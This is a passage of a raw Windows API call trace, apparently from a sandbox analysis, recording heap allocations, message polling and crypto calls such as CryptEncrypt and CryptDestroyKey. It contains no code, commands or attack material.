RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0031.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.068] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.068] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0031.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cca0 [0031.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0031.068] PeekMessageW (in: lpMsg=0x6adcd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6adcd4) returned 0 [0031.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0031.068] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0031.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0031.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0031.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0031.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0031.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0031.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0031.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0031.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0031.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0031.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0031.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0031.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0031.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0031.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.069] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8891d8 [0031.069] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0031.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0031.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0031.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0031.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0031.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0031.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0031.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0031.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0031.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0031.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0031.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0031.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0031.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0031.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da368 [0031.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0031.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0031.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0031.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0031.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0031.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889b08 | out: hHeap=0x770000) returned 1 [0031.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0031.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0031.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0031.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0031.070] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0031.070] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18c8 [0031.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0031.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0031.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae928 [0031.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0031.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0031.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0031.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0031.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da368 [0031.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0031.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0031.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0031.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da368 | out: hHeap=0x770000) returned 1 [0031.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0031.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da378 | out: hHeap=0x770000) returned 1 [0031.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0031.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0031.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0031.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0031.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0031.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0031.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0031.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0031.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.071] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0031.071] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7f0 [0031.072] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0031.072] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0031.072] CryptGetKeyParam (in: hKey=0x7c21c0, dwParam=0x7, pbData=0x7da2f8, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da2f8*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0031.072] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.072] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0031.072] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.072] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.072] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.072] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.072] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.072] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.072] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0031.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1c88 | out: hHeap=0x770000) returned 1 [0031.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0031.072] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.072] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0031.072] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0031.072] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.072] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.072] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0031.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.072] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0031.073] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.073] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0031.073] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.073] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.073] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.073] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0031.073] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.073] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0031.073] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.073] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.073] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x1575, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x1580) returned 1 [0031.073] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.073] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.073] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0031.073] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.073] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.073] CharLowerBuffW (in: lpsz="byte[5505]", cchLength=0xa | out: lpsz="byte[5505]") returned 0xa [0031.073] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.074] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.074] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.074] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0031.074] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.074] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x956598*, pdwDataLen=0x6ae220*=0x1575, dwBufLen=0x1580 | out: pbData=0x956598*, pdwDataLen=0x6ae220*=0x1580) returned 1 [0031.074] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.074] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0031.074] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.074] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.074] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.074] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.074] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0031.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0031.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.074] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.074] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0031.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0031.074] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.074] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0031.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0031.074] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9b8 | out: hHeap=0x770000) returned 1 [0031.075] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.075] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0031.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.075] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0031.075] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.075] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0031.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0031.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccb8 | out: hHeap=0x770000) returned 1 [0031.075] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.075] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.075] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.075] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0031.075] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.076] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.076] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.076] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0031.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.076] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.076] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.076] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.076] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0031.076] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.076] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0031.076] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0031.076] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 